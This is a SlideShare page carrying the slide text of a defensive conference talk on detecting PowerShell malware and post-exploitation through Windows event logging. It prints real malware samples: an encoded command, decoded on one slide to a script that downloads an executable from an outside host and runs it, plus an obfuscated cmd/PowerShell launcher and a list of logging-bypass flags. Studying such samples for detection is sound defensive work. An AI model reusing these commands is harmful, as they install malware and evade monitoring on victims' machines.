byBalaji Rajasekaran
 
PPTX
Let's Talk Technical: Malware Evasion and Detection
byJames Haughom Jr
 
PDF
Iranian Non-malware Fileless Attacks targeting aerospace and telecom
byAhmedA79
 
PPTX
Pwning the Enterprise With PowerShell
byBeau Bullock
 
PPTX
Drilling deeper with Veil's PowerTools
byWill Schroeder
 
Powering up on PowerShell - BSides Greenville 2019
byFernando Tomlinson, CISSP, MBA
 
Proper logging can catch breaches like retail PoS
byMichael Gough
 
Bsides tampa
byOctavio Paguaga
 
Incorporating PowerShell into your Arsenal with PS>Attack
byjaredhaight
 
BSidesPGH 2019
byBrianGardiner12
 
The Dark Side of PowerShell by George Dobrea
byEC-Council
 
Hacked? Pray that the Attacker used PowerShell
byNikhil Mittal
 
Powering up on power shell avengercon - 2018
byFernando Tomlinson, CISSP, MBA
 
Powering up on PowerShell - BSides Charleston - Nov 2018
byFernando Tomlinson, CISSP, MBA
 
Catch Me If You Can: PowerShell Red vs Blue
byWill Schroeder
 
PSConfEU - Building an Empire with PowerShell
byWill Schroeder
 
Who Should Use Powershell? You Should Use Powershell!
byBen Finke
 
2017-BSidesCharm-DetectingtheElusive-ActiveDirectoryThreatHunting-Final.pdf
bykhalil511890
 
Building an Empire with PowerShell
byWill Schroeder
 
From P0W3R to SH3LL
byArthur Paixão
 
Catching fileless attacks
byBalaji Rajasekaran
 
Let's Talk Technical: Malware Evasion and Detection
byJames Haughom Jr
 
Iranian Non-malware Fileless Attacks targeting aerospace and telecom
byAhmedA79
 
Pwning the Enterprise With PowerShell
byBeau Bullock
 
Drilling deeper with Veil's PowerTools
byWill Schroeder
 

More from Michael Gough

PDF
LasCon - Hacking a backup power solution(s) for your home, Tornado tested! v2
byMichael Gough
 
PDF
Hacking a backup power solution(s) for your home, Tornado tested!
byMichael Gough
 
PDF
Can_We_Really_Detect_These_So_Called_Sophisticated_Attacks?
byMichael Gough
 
PDF
My InfoSec journey led me to create my own IR tools, how, and why you should too
byMichael Gough
 
PDF
Sophisticated Attacks - Can We Really Detect Them _v1.2.pdf
byMichael Gough
 
PPTX
Incident Response Fails
byMichael Gough
 
PDF
When Security Tools Fail You
byMichael Gough
 
PDF
MITRE AttACK framework it is time you took notice_v1.0
byMichael Gough
 
PDF
Cred stealing emails bsides austin_2018 v1.0
byMichael Gough
 
PDF
Email keeps getting us pwned - Avoiding Ransomware and malware
byMichael Gough
 
PDF
Email keeps getting us pwned v1.1
byMichael Gough
 
PDF
Email keeps getting us pwned v1.0
byMichael Gough
 
LasCon - Hacking a backup power solution(s) for your home, Tornado tested! v2
byMichael Gough
 
Hacking a backup power solution(s) for your home, Tornado tested!
byMichael Gough
 
Can_We_Really_Detect_These_So_Called_Sophisticated_Attacks?
byMichael Gough
 
My InfoSec journey led me to create my own IR tools, how, and why you should too
byMichael Gough
 
Sophisticated Attacks - Can We Really Detect Them _v1.2.pdf
byMichael Gough
 
Incident Response Fails
byMichael Gough
 
When Security Tools Fail You
byMichael Gough
 
MITRE AttACK framework it is time you took notice_v1.0
byMichael Gough
 
Cred stealing emails bsides austin_2018 v1.0
byMichael Gough
 
Email keeps getting us pwned - Avoiding Ransomware and malware
byMichael Gough
 
Email keeps getting us pwned v1.1
byMichael Gough
 
Email keeps getting us pwned v1.0
byMichael Gough
 

Recently uploaded

PDF
Build Next-Gen Spatial & Sensor Workflows: Secure, Scalable Processing in Sno...
bySafe Software
 
PDF
When Drones Decide for Themselves_ Inside the Rise of Machine-Led Flight.pdf
byLyra Anderson
 
PDF
Why AI Girlfriends Are the Future of Digital Companionship
byAi Angels
 
PDF
Computer-Based Training (CBT) The Backbone of Modern Technical & Defence Trai...
bycomputerbasedtrainin1
 
PDF
Fortinet Certified Fundamentals in Cybersecurity
byVICTOR MAESTRE RAMIREZ
 
PDF
EU regulations for the North American book supply chain - Tech Forum 2026
byBookNet Canada
 
PDF
Parental Control App for Phones_ The Complete 2026 Guide for Safer, Smarter P...
byRyan Cooper
 
PDF
Quick Learn Laravel for Beginner from Zero to Survive
byiDev Semarang
 
PDF
Transcript: EU regulations for the North American book supply chain - Tech Fo...
byBookNet Canada
 
PPTX
Jisc Equipment Data Service Update Workshop 3 December 2025
byJisc
 
PDF
Agentic-Document-Extraction-2026-Presentation.pdf
byTamanna
 
PDF
2026_01_28 - OpenMetadata Community Meeting.pdf
byOpenMetadata
 
PDF
Afsar Ahmed - Digital Marketing Portfolio
byAfsar Ahmed
 
PPTX
2026 SCORM Troubleshooting Rustici + dominKnow.pptx
byRustici Software
 
PDF
Dev Dives: Build and deploy agentic automations - the unified way
byUiPathCommunity
 
PDF
ICT500 - CRITICAL AND CREATIVE THINKING FOR INFORMATION TECHNOLOGY SOLUTIONS:...
by2024432452
 
PDF
7 Essential Types of Penetration Testing Services Every Business Should Under...
bypandeydevika621
 
PPTX
Spacecraft Guidance Quick Research Guide by Arthur Morgan
byArthur Morgan
 
PDF
JCB_3CX_SPECS (24 págs) companywrench.com .pdf
byAquilesOyarzn1
 
PDF
Chapter 3 Cryptography and encryption techniques.pdf
byGetnet Tigabie Askale -(GM)
 
Build Next-Gen Spatial & Sensor Workflows: Secure, Scalable Processing in Sno...
bySafe Software
 
When Drones Decide for Themselves_ Inside the Rise of Machine-Led Flight.pdf
byLyra Anderson
 
Why AI Girlfriends Are the Future of Digital Companionship
byAi Angels
 
Computer-Based Training (CBT) The Backbone of Modern Technical & Defence Trai...
bycomputerbasedtrainin1
 
Fortinet Certified Fundamentals in Cybersecurity
byVICTOR MAESTRE RAMIREZ
 
EU regulations for the North American book supply chain - Tech Forum 2026
byBookNet Canada
 
Parental Control App for Phones_ The Complete 2026 Guide for Safer, Smarter P...
byRyan Cooper
 
Quick Learn Laravel for Beginner from Zero to Survive
byiDev Semarang
 
Transcript: EU regulations for the North American book supply chain - Tech Fo...
byBookNet Canada
 
Jisc Equipment Data Service Update Workshop 3 December 2025
byJisc
 
Agentic-Document-Extraction-2026-Presentation.pdf
byTamanna
 
2026_01_28 - OpenMetadata Community Meeting.pdf
byOpenMetadata
 
Afsar Ahmed - Digital Marketing Portfolio
byAfsar Ahmed
 
2026 SCORM Troubleshooting Rustici + dominKnow.pptx
byRustici Software
 
Dev Dives: Build and deploy agentic automations - the unified way
byUiPathCommunity
 
ICT500 - CRITICAL AND CREATIVE THINKING FOR INFORMATION TECHNOLOGY SOLUTIONS:...
by2024432452
 
7 Essential Types of Penetration Testing Services Every Business Should Under...
bypandeydevika621
 
Spacecraft Guidance Quick Research Guide by Arthur Morgan
byArthur Morgan
 
JCB_3CX_SPECS (24 págs) companywrench.com .pdf
byAquilesOyarzn1
 
Chapter 3 Cryptography and encryption techniques.pdf
byGetnet Tigabie Askale -(GM)
 

BSidesOK_You_CAN_detect_PowerShell_attacks_v1.1

  • 1.
    PowerShell post-exploitation, PowerSploit, Bloodhound, PowerShellMafia,Obfuscation, and PowerShell Empire, the Empire has fallen, you CAN detect PowerShell exploitation Michael Gough MalwareArchaeology.com MalwareArchaeology.com
  • 2.
    Who am I •Blue Team Defender Ninja, Malware Archaeologist, Logoholic • I love “properly” configured logs – they tell us Who, What, Where, When and hopefully How Creator of “Windows Logging Cheat Sheet”, “Windows File Auditing Cheat Sheet” “Windows Registry Auditing Cheat Sheet”, “Windows Splunk Logging Cheat Sheet” “Windows PowerShell Logging Cheat Sheet”, “Malware Management Framework” And just released “Windows Advanced Auditing Cheat Sheet” • Co-Creator of “Log-MD” – Log Malicious Discovery Tool – With @Boettcherpwned – Brakeing Down Security PodCast • Co-host of “Brakeing Down Incident Response” podcast • @HackerHurricane also my Blog MalwareArchaeology.com
  • 3.
  • 4.
    PowerShell Exploitation • Malwareloves to use PowerShell to download and launch payloads – They try and hide it too • Red Teamers love PowerShell – They love to hide too – It is already built into the OS • But they DO make noise and CAN be detected – If you know how MalwareArchaeology.com
  • 5.
    So where dowe start? MalwareArchaeology.com
  • 6.
  • 7.
    What is set?What version? • What version PowerShell you running? • Is PowerShell logging enabled? • Are you using a PS v2 profile.ps1 to set logging? • What is your Execution Policy? • How can you check? MalwareArchaeology.com
  • 8.
  • 9.
    Audit with LOG-MD •We give you a report MalwareArchaeology.com
  • 10.
  • 11.
    PowerShell has Logs! •You MUST enable them, not configured by default ;-( • “Windows Logging Cheat Sheet” (CMD LINE) • “Windows PowerShell Logging Cheat Sheet” – Follow the guidance – MalwareArchaeology.comcheat-sheets • Module Logging • ScriptBlock Logging • Transcripts if you want • Profile.ps1 for PS v2 – nop (no Profile) will bypass this ;-( MalwareArchaeology.com
  • 12.
    PLEASE UPGRADE • Forthe love of NOT getting pwned… • Upgrade to PowerShell v5 • FYI – PS v6 is out and renamed the binary to pwsh.exe • So update all the queries to look for BOTH PowerShell and Pwsh • PS 5 & 6 has logging that can’t be bypassed as easily like v2, 3 and 4 with the –nop (NoProfile) MalwareArchaeology.com
  • 13.
  • 14.
    What is MalwareUsing? • LOTS of PowerShell – In most, if not all malware we see – Hearing it a lot in targeted attacks – Living off the land, all the files are already there – Just add script/commands and run • PenTesters, The RED TEAM also loves them • There are LOTS of PS post-exploit kits • You will hear the term “Non-Malware” attacks MalwareArchaeology.com
  • 15.
    Exploit Kits • PowerSploit •PowerShellEmpire • EmpireProject • BloodHound • PSRecon • PowerShell-Suite • PowerTools • Powershell-C2 • PSAttack • And more… MalwareArchaeology.com
  • 16.
    4688 – PowerShell Bypass Inthe Security Log MalwareArchaeology.com
  • 17.
    They do thisto hide what you see • 4688 will capture this behavior • Stops profile.ps1 from loading in case there is any logging set inside it, hide the window, and ignore any execution policies • YAY Microsoft.. Allows built-in bypasses • LOTS of way to spell the bypasses MalwareArchaeology.com
  • 18.
    PowerShell Bypasses • -WHidden (Hide the window YOU see) • -NoP –sta –NonI –w hidden (no Profile, Hidden, Non-Interactive) MalwareArchaeology.com
  • 19.
    Security Log -4688 PowerShell Web Calls MalwareArchaeology.com
  • 20.
    Fetch !!! • Themalicious payload must phone home to get the dropper • System.Net.WebClient • DownloadString and/or http • -Enc or Encoded • There are lots of ways to spell PS commands ;-( MalwareArchaeology.com
  • 21.
    Base64 Encoded • Newway to hide from the “Process Command Line” 4688 event – No bypass words to check for… Silly hackers… It is still easy to spot • POWeRshEll -enCodedCOMmaNd – ZgB1AG4AYwB0AGkAbwBuACAAaQBlAFcATABkAFcAQQB3AHQASABpAEYAZABmAEMAUwBPAHMATQBiAHM AdwBzAGUAZgAgACgAIAAkAFgARABKAFEAaABXAGYAcQBWAHUAWABvAFIASQAgACwAIAAkAHMAYgBUAGYA TwBUAHQAbQBKAHMAaQBFAFkAVgBZAHgAIAApAHsAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAAUwB5AH MAdABlAG0ALgBOAGUAdAAuAFcAZQBiAEMAbABpAGUAbgB0ACkALgBEAG8AdwBuAGwAbwBhAGQARgBpA GwAZQAoACAAJABYAEQASgBRAGgAVwBmAHEAVgB1AFgAbwBSAEkAIAAsACAAJABzAGIAVABmAE8AVAB0AG 0ASgBzAGkARQBZAFYAWQB4ACAAKQA7ACgATgBlAHcALQBPAGIAagBlAGMAdAAgAC0AYwBvAG0AIABTAGgAZ QBsAGwALgBBAHAAcABsAGkAYwBhAHQAaQBvAG4AKQAuAFMAaABlAGwAbABFAHgAZQBjAHUAdABlACgAIA AkAHMAYgBUAGYATwBUAHQAbQBKAHMAaQBFAFkAVgBZAHgAIAApADsAIAB9AA0ACgB0AHIAeQB7AA0ACgB rAGkAbABsACAALQBwAHIAbwBjAGUAcwBzAG4AYQBtAGUAIABFAFgAQwBFAEwAOwAgAA0ACgAkAEgAWQBs AFoAYgBVAFcAZwBGAHYAUABZAGkAZwA9ACQAZQBuAHYAOgBVAFMARQBSAFAAUgBPAEYASQBMAEUAKwAn AFwASwBkAG0ATwBiAFEAWgBWAEIAeQBRAHAAdgBCAFMAUQBpAHoAcAAuAGUAeABlACcAOwANAAoAaQB lAFcATABkAFcAQQB3AHQASABpAEYAZABmAEMAUwBPAHMATQBiAHMAdwBzAGUAZgAgACcAaAB0AHQAcA BzADoALwAvAGMAbwBtAGYAeQAuAG0AbwBlAC8AeQBiAG4AdwBpAGYALgBqAHAAZwAnACAAJABIAFkAbAB aAGIAVQBXAGcARgB2AFAAWQBpAGcAOwANAAoADQAKAH0AYwBhAHQAYwBoAHsAfQA= MalwareArchaeology.com
  • 22.
    Manual Translation • Ona website MalwareArchaeology.com
  • 23.
    PowerShell Log -4104 Module Logging MalwareArchaeology.com
  • 24.
    Translated… Fetch • functionieWLdWAwtHiFdfCSOsMbswsef ( $XDJQhWfqVuXoRI , $sbTfOTtmJsiEYVYx ){(New-Object System.Net.WebClient).DownloadFile( $XDJQhWfqVuXoRI , $sbTfOTtmJsiEYVYx );(New-Object -com Shell.Application).ShellExecute( $sbTfOTtmJsiEYVYx ); } • try{ • kill -processname EXCEL; • $HYlZbUWgFvPYig=$env:USERPROFILE+'KdmObQZVByQpvBSQizp.exe'; • ieWLdWAwtHiFdfCSOsMbswsef 'https://comfy.moe/ybnwif.jpg' $HYlZbUWgFvPYig; • }catch{} • Catch it as a PS 4104, not a Process Create 4688 MalwareArchaeology.com
  • 25.
    PowerShell Decodes foryou !!! • 4104 event will decode any –Encoded, Base64 blobs • Module Load MalwareArchaeology.com
  • 26.
    Security Log –4688 PowerShell Log – 4104 Windows PowerShell Log - 400 Obfuscation MalwareArchaeology.com
  • 27.
    Fetch !!! • Theywill try to hide or obfuscate their behavior to make it hard to read • To me, this makes no difference, except I can’t easily understand what they are doing • They will add plus“+” to add/connect variables • They will use ticks ‘ or ^ carats to break word checks • They will use dollar $ or percent % to designate variables • So look for the Odd Characters that indicate obfuscation! – You can thank Daniel Bohannon for this shtuff MalwareArchaeology.com
  • 28.
    Obfuscation – Oddstuff - 4688 • Becomes obvious very quickly.. This is BAD MalwareArchaeology.com Ticks Plus +
  • 29.
    Obfuscation – Oddstuff - 4104 • Now you can’t look for words, so adapt MalwareArchaeology.com Lots of special characters, some normal for PS
  • 30.
    Even older PowerShellv2 Event ID 400 • Look for odd characters • Count of characters are very telling once isolated or extracted from the blob MalwareArchaeology.com
  • 31.
    4688 - ProcessCreate Security Log MalwareArchaeology.com
  • 32.
    Typical Malware launchingPowerShell 1. User launches MS Word 1. Calls CMD.exe 1. Calls PowerShell and downloads dropper 1. Calls Malware 1. Calls 2nd copy of Malware MalwareArchaeology.com
  • 33.
    This PowerShell looksodd • cmd jwaMLXnC iTahsHIpaITIFJCDLrOwoC XwSDfYdvV & %C^om^S^pEc% %C^om^S^pEc% /V /c set %LkOzPNSShSlqiXU%=HkMCjGoAjaAcJ&&set %var1%=p&&set %var2%=ow&&set %AhUBjnMNLHEFDPI%=pRLBAwJEiiE&&set %var7%=!%var1%!&&set %vNQpMqIhkQoukIa%=cHwdrjXtIoaIBY&&set %var3%=er&&set %var8%=!%var2%!&&set %var4%=s&&set %QSAiRAvRrPuhXMB%=ataDjzmFNO&&set %var5%=he&&set %var6%=ll&&!%var7%!!%var8%!!%var3%!!%var4%!!%var5%!!%var6%! "(nEW-ObJECT ManAGEMEnT.AuToMATIoN.PsCReDEntIAl ' '. ( '76492d1116743f0423413b16050a5345MgB8AGYAZgB2AFEAYgBtAEwAUQB5AEUAbgAwADkAUQA3AFkAUQBuAEcAVwBxAHcAPQA9AHwANAA1ADMAMQBiADkAMQAzADUAYwBiAD EAZAA2ADMAMgA5AGIANABhADQAZQA1ADUAZgA1ADMAZQA4ADYAZQBiADgAYQAyAGUAZgA3ADYANABkAGUANQBjADMAMQA3AGQAZgA5ADcAZABjAGUANwA4AGMAZAA4AD kAOAA0ADAAOQA4ADgANAA2AGUAYgA0ADAAMQA3ADUAYgA5AGMANwAwAGEANgA3ADIANQAyADEANgBmADQAZQA3ADcAZgA4ADMAMABkAGMAOABhAGQAOQA2AGIAZQAx AGMAZQBhADYAMwAxAGUAMQAzAGEANQA0ADgAYwBmADMAMQA1ADgANAAyADEAOABiAGQAOABjADAAOAAzAGUAOQA3ADIAYwA4AGIAZgBhADAAMQA1ADkAYQBjAGMAN ABlAGUAMABlAGUAMQBjADcAZQBhADMAZQBlAGEAMQBlADkANABkADYAOAAzAGEAYQA3ADcAMQBiADQAYwA5AGUANgBkAGMAYQBmADkANAA5ADYAMgBiADYAYwBkADMA OQA3ADEAZgA1AGYAYwBjADAAZQBiAGQAOAAzADQAOAA4AGMAZQA3AGMAZABjAGIAYQBiAGYAZAA4ADgAOQBiADgAOAAyADcANwAwADcANAA0ADIAZAAyADMAZQAwADMAO QBlADUANQA1ADUAMQBiADUAZgAxADgAOAA1ADcANgA5ADMANABkADkANAAzADUANwAzADgAOQA3ADAAMABiAGUAMwBiAGYAMwA1ADEAMQBiAGEANgBiADYAYgAwADUA NQAxAGUANAA3ADUAMgBjAGUANAA4ADgAYQBiADYAMQA3ADUAOQBkADEAZQA1ADUANAA3ADUANwA2ADYAOABlADgANwBmAGMAMQAzADQANwBmAGEANgA4AGUAMwA0 ADAANwBmADAANQBiADkANwAyAGEANAA3ADIAZAA3AGIAMgAxADYAYwBmADAAMwA0ADYAYwA2ADYAYgAxADkAMQA3AGUAYgA0ADkAOABiADUANgAyADgAMQBmADQAYgA 2ADYAMQAyAGMAOQAxAGEAOQA5AGEANQBiADcAYgBhAGQAYgA1ADgAZQBiAGMAZgA4AGEAMQA2ADAANgAzADkAMwBjAGIAMgA4ADcANwA3ADIANAAxADcANgAwADEAZQA2 AGQAMwBiAGYAMgBhADEAMQAxADMAYQAyAGUAOQBmADIAYgA4AGUAZQA0ADUAMwBmAGYAYwAzAGIAMABiAGMAYwAyADYANQBmADcAMgAzAGUAYgBmAGQAYgA1ADQA OAAwADEANAA3ADcAZgAyAGQAZAA4AGUAYgBhAGYAOQA1ADMAMgA5AGEANgA2ADQANwAwAGUANwAzADMAZQBlADgAMgBjAGEAYwAzAGQAOQBhADQAYQA4ADAAMgAwA GQAOABkAGMANwAxADAANQA5ADEAYwBkAGIAYgA4ADMANgAwADYAZQBkAGYAMAA4ADgAMwBmADUANABhAGYAOABmADgANQAyADAAMQA4ADYAYwAxADMAMQBiADkAZ gA4AGIAZQAzADQAZgA5AGYAMQBkADcAOQA4AGIAZgAxADcAOAAxADMAOAA5ADEANQAxAGQAYQBjADIAYwAxADcAMAAwADEANwAzADgAMQA4ADgAMgA0ADMAMwBmADMA ZQBkADUAMAA4ADYAYQBiADIAYgAxAGEAYgA3ADMAMAAxADAAMABhADIAYwA1AGYAZgA0ADkAYgBiADkANwBjAGMANwBkADgAMQAzADUAMAAxADAAZQBmAGEAMQAyADQA OQBhAGMAMQBkAGYAZgBjAGEAZgBiADYAMAA2ADUAOABhAGYANwAzADEAOQAzADEAZQBhADUANwA4AGMAYQBmADEANwAxADEAOAA1ADgANgA0ADkANABjADYAMABkAGU AYgA2AGUAMQBlAGIAMgA5ADkAYQAwADAANgA1ADAANgAxADYANgBkADUAYwA2AGIAYgAyAGYAMAA0ADYAYgBlADAANwA1AGQAOQAxADcAOABmAGMAOAA2ADEAMQA4ADc AMAA3ADcAYwA0AGUAYgA2AGIAOQAyADMAYgBhADgAMQBlADAAOQA3ADgANgBkAGIAYwA4ADEAMgA2ADQAZgA5AGMAOQAwAGYAZAAwADQAYQBkAGUAOAA1ADkAZQBlAD UANwA2ADgANAA4ADkANQBiADgAMgAzADMAMgAwAGUAYgA1ADMANQBiAGUANAA5AGMAYgA4ADAAYQA4AGQANABiAGEAMwA1ADQAMwBhADAAMQA3AGYAYwAwADMAY wA3ADEAYwAyADQAZQBlAGMAOQBmADkAMgA0AGMAYQAyAGMANgA2AGQAOABlADQAOAA5ADUAMwBjADQAZABkADIAZQA2ADQAYQAzADgANAAxADcAOABmAGMAMABhAG QANgAyADIANwA4ADQAYQA2AGYANABiADgAMQA4ADcAYgAwADgAZABmADgAMQA0AGMAYwBhADcAYgBlAGEAOQAyADcAMgBiADcAOAAxADkAMQBiADcAZAAwADUANgA0AG QAMwAzAGYAMQBjADgAOQBiAGUAZQA3ADgAZAAxAGIANwA1AGMAMQA2ADIAOQAyADMAMAA3ADcAZgA4ADEAZAAyADQAZABkAGUANwBlAGYANAA1ADAANABkADUAMgAxA DEANgAxADgAZQBjAGUAMwBlADUAMQAyADgANABlADEANwA4ADYAZABlADIAMgA5ADAAYgAwADYANAA2ADAAZQA2ADIAMQBlADQAYwA5ADAAZAA0ADgAOAA4ADgANgA5ADc ANAA2ADMAYwBjADIAOABlADYAYwBiADYAMwA2AGUAMAAxADEAZgA2AGMAYgAzAGUANwBjADIAMABmADcANgAwADgAMgA4AGYAZAA5ADgAOQBjADMAZgBiAGUAYgA4ADkA MQA4AGIANwA2ADYAYgBhAGMAMQA4ADUAMAAwADMAMQAyADEAYQA2ADUAMQBhADQANABlADAAMQA5AGYAZQAxADcAZgBjADIANQBjADgANgA3ADUAOQA0ADIANwA4AD cAYgA1ADUAYgA0ADAANAA0ADkAMgBhAGMAZQBmAGEAZAAwAGEAZQBjAGIAMQBkAGEAMwAzADEAMABlADMAOQAyADAAZABkADMAMQA1ADQAMgA4ADEAMABlADQAZgAx AGIAZAAyADkAZgA2ADIAMwBkADAAMgBjAGQAYgBlADYAMgBkADEAYwBjADMAMwBhADUANgA2AGIAMQA1ADMAYwA3ADMANQA4AGEAYwAyADkAOAA3AGUANQBmAGYAOAA 3ADMAZQA1AGMAOQBkAGQAYwBiADcAMQA1ADAANwAwAGUAYwAwAGIANAA3ADQANwAwADMAMAA2ADEAOQAxADcAOAA0AGUANQA4ADgANgBlADAANQA3AGQANwAxAGI ANAAyAGQANgA2ADUAOQA0ADkAMAA1ADkANQBkADQAZgBhAGUANAAzADUANQA4ADQAMwBkAGIAMwBhAGQAZgA5ADEAYgA3ADcAMABhADMAYQA2AGUAYQAwADkANwAx AGMAYQA3AGIANAAwADkANgA2AGYAMQA1ADcANQA1AGMAYQA3AGYAMQA2AGIANgAyADAAMAA4ADEAYgAwADcAZQBhADUAYQBjAGQAOQBhADUAZgAzAGMANQBiADIANQA yADQAOAA2ADgANwA0ADgANgAyADIAYwAxADQAYgBlADgAZAA3ADUANAA5AGQAZQA5ADkAMAAwADkANwBjADcAMABkAGQAMgBiADcAMABiADEAYwBjADAANgBkADIAYgA4A DYAMQAyADUAMgA2ADgAMAA0AGEAYQBlAGMANAAxADUAZQAxADEAOAAzADgAZgA0ADIAMgA3ADEAYQBiAGYAOABhADAAMgBiADkANwA0ADMAOQAwAGQAMgA2ADMAYwB kADYAYQA4ADAANgA1ADgAMgBlAGEANwA3AGQAMQAwADQAYQBhAGQAOABlADgANQBlAGMAZQA1ADAAZABkAGIANQAwAGEAYgBmAGMAOAAzADAAMwBlADUAMgBiADYAY wBiAGMAMwBjADAAZAAzADEAZQBiAGMAYwAxAGMAMgBjADAAMwAzADEAMgAzAGYAYwBkAGMANgA1AGMANwA0AGUANQA4ADYAMQA5AGYAZAA0ADgAMQA3AGUANQA4A DUANwBlADgAZQAxAGUAOQA1AGMAZgBjAGQAMwBkADMAZgBmADgAMwBjADEAMAA4ADgANAA5ADMAYwBmADAAMAAzADUAYwBkADEAZAAxADkAMAAxADYANgA4ADgAMQ A5AGIAOQBiADkAMwAzADUAMgA4ADAAOAAxAGQAZQBkAGEAYwA0ADIAMwBiADUANAAwADQAMgAzADMANwBlAGEAZQA4ADgAMgAwADEAYQAyAGQAMAA2AGYAZQA3ADYA YQAwADEANQBjAGUAZQA5ADAAMABkAGMAMAA2AGIAZQBhADAANwBiADQAMQBjADAAZQAyAGUAOQAyADAAZgAyAGUAYgBmADQANAA0ADIAZAA2AGYAOAAwAGUAYQA3AD kANwA1ADcAOABjADUANgA0ADAANgAwAGYAYgA0ADUANwBjAGYAOAAxADUAOAA1AGUAZAA5ADEANABjADAAMAAyADcAOAA5ADIAZQBiAGQAMABlADUAMAA2ADkAZAAyADc AMwAxAGEAOAA4ADcAZQA1AGIAMAAzADcAYgBiAGQAMABjAGYAOAA0ADQAYQAyADEANwA0ADAAYgA2AGMAMgA4ADMAOQAxAGIAOQBmADMANgBlADQAMABjADAAMQA1A DYAYgA4ADQAMwA5AGMANwBhADYANABhAGUAYgA3ADUAZgBmAGYAMgBhADAAYQBiAGQAZQA3ADUAZgBiADMAMQA4ADcAMQA5AGYAZAAyADkAZAAxAGMANQA3AGEAYgA wADcANAA2AGUAMQA1ADEAYQBlAGMAZgAwAGMAZAA0ADQAYgAwAGQAMwA2ADAAMQBhAGEAYQA4ADkAZgBhADEAMwBjADAANQA3ADgANgAyAGQAMQAxAGIAZgA2AGMA NQBhADkAOABhADIAOAA0AGEANgBhADIAYgBkAGYAYQBhAGUANwA0AGYAOQBjADAAZABkADMAYwBiADAAZgBjAGIAMgAyADUAMgBiADEAZgA1ADcAMQAxAGEAYwAxAGMANw A3ADIANQAxADgAOAAxAGUAYQAxAGQAZQBkADAAMQA3ADEAZAAwADcANQA0ADcAMAAxADIANgAzADcAMgBiADcANwBkADgAMQAyAGQAYgBiAGEAZAA4ADEAZgAzADgAZABk ADcAZAA2ADcANQA5AGYANwBiADMA'|CONVerttO-SecuresTrInG -ke 150.105.213.121.221.126.137.121.68.30.46.202.28.13.28.138 ) ).gETNEtwORkCrEdeNTIaL().pasSwoRD|.((vAriabLE '*mdR*').NAME[3.11.2]-JOin'') MalwareArchaeology.com
  • 34.
    This PowerShell looksodd • cmd jwaMLXnC iTahsHIpaITIFJCDLrOwoC XwSDfYdvV & %C^om^S^pEc% %C^om^S^pEc% /V /c set %LkOzPNSShSlqiXU%=HkMCjGoAjaAcJ&&set %var1%=p&&set %var2%=ow&&set %AhUBjnMNLHEFDPI%=pRLBAwJEiiE&&set %var7%=!%var1%!&&set %vNQpMqIhkQoukIa%=cHwdrjXtIoaIBY&&set %var3%=er&&set %var8%=!%var2%!&&set %var4%=s&&set %QSAiRAvRrPuhXMB%=ataDjzmFNO&&set %var5%=he&&set %var6%=ll&&!%var7%!!%var8%!!%var3%!!%var4%!!%var5%!!%var6%! "(nEW-ObJECT ManAGEMEnT.AuToMATIoN.PsCReDEntIAl ' '. ( '76492d1116743f0423413b16050a5345MgB8AGYAZgB2AFEAYgBtAEwAU QB5AEUAbgAwADkAUQA3AFkAUQBuAEcAVwBxAHcAPQA9AHwANAA1 ADMAMQBiADkAMQAzADUAYwBiAD – 42 more lines of Script Block code • ADcAZAA2ADcANQA5AGYANwBiADMA'|CONVerttO-SecuresTrInG -ke 150.105.213.121.221.126.137.121.68.30.46.202.28.13.28.138 ) ).gETNEtwORkCrEdeNTIaL().pasSwoRD|.((vAriabLE '*mdR*').NAME[3.11.2]-JOin'') MalwareArchaeology.com
  • 35.
    Did that looknormal? • 4688 will show you the Process execution – What called what • What called PowerShell, and the parents above – Word > CMD > PowerShell = Always BAD • What did PowerShell logging catch? – That big blob looked interesting MalwareArchaeology.com
  • 36.
    4104 - PowerShell ScriptBlock Logging Microsoft-Windows-PowerShell/Operational Log MalwareArchaeology.com
  • 37.
    Script Blocks arelabeled MalwareArchaeology.com
  • 38.
    Then you willsee this in the logs • It is not translated, just recorded • But they are LARGE – You can trigger on say > 1000 characters – You can see this one will also trigger Obfuscation MalwareArchaeology.com
  • 39.
    This is anormal Script Block MalwareArchaeology.com
  • 40.
    Do they lookthe same? MalwareArchaeology.com Readable NOT Readable Obfuscated
  • 41.
  • 42.
    4104 - PowerShell ModuleLogging Microsoft-Windows-PowerShell/Operational Log MalwareArchaeology.com
  • 43.
    WARNING !!!! MalwareArchaeology.com • PowerShelldoes have a WARNING if something is odd • Trigger Alerts on these too • 4104
  • 44.
    WARNING !!!! • TheRemote Command along with all this… = BAD MalwareArchaeology.com
  • 45.
    WARNING !!!! • Andthe raw log MalwareArchaeology.com
  • 46.
    WARNING !!!! • Andyou can see translation in Event ID 4100 MalwareArchaeology.com
  • 47.
    WARNING !!!! • Andyou can see translation in Event ID 4100 MalwareArchaeology.com
  • 48.
    4100 – ExecutingPipeline • Can see some translation occurring MalwareArchaeology.com I can read this NOT this
  • 49.
    PS v2 -500 Events • Windows PowerShell MalwareArchaeology.com
  • 50.
    PS v2 200Events • Command Health MalwareArchaeology.com
  • 51.
  • 52.
    Filtering out thegood, to find the bad • PLEASE put a Mark/Sign/Secret Key in your scripts MalwareArchaeology.com
  • 53.
    Code your PowerShellfor exclusion • Make the scripts excludable on obvious things YOU or your company does or knows • The path is awesome – All scripts excluded by path alone • Names, Secret Code, Key – Have your scripts contain something only you know that is a ‘secret key’ to exclude by • Or.. Sign your PS scripts MalwareArchaeology.com
  • 54.
    Once you create thesequeries MalwareArchaeology.com
  • 55.
    Create Email Alerts •Trigger on PS launching • Tweak and filter out known good – Get your developers to mark their code!! MalwareArchaeology.com
  • 56.
    PowerShell Log Goodness •Enable the logs per the Cheat Sheets • PS v2 Logs (even if you have PS v5) – Collect Event ID 200, 400, and 500 – Windows PowerShell • PS v5 v6 Logs (maybe v4 if you hack it) – Collect 4100, 4104 – Microsoft-Windows-PowerShell/Operational • Windows Logs – Collect 4688 – WITH Process Command Line MalwareArchaeology.com
  • 57.
    Security Log Event ID- 4688 • PS executed • PS Bypass executed • PS Suspicious buzzwords • PS Count Obfuscation Characters (‘ + $ % ;) • You can look for large Scripts Blocks and Base64, but use the PS logs for this MalwareArchaeology.com
  • 58.
    PowerShell v2 • 200– Command Health – WARNING, will give you some translation • 400 – Engine Lifecycle – What executed • 500 – Command Lifecycle - What executed and the command line if using profile.ps1 – and if “No Profile” (-nop) is not bypassed MalwareArchaeology.com
  • 59.
    PowerShell v2 Event IDs- 200 and/or 400 • PS Web Call • PS Count Obfuscation Chars (‘ + $ % ;) • PS ScriptBlock size (> 1000) • PS Base64 blocks • PS WARNINGS MalwareArchaeology.com
  • 60.
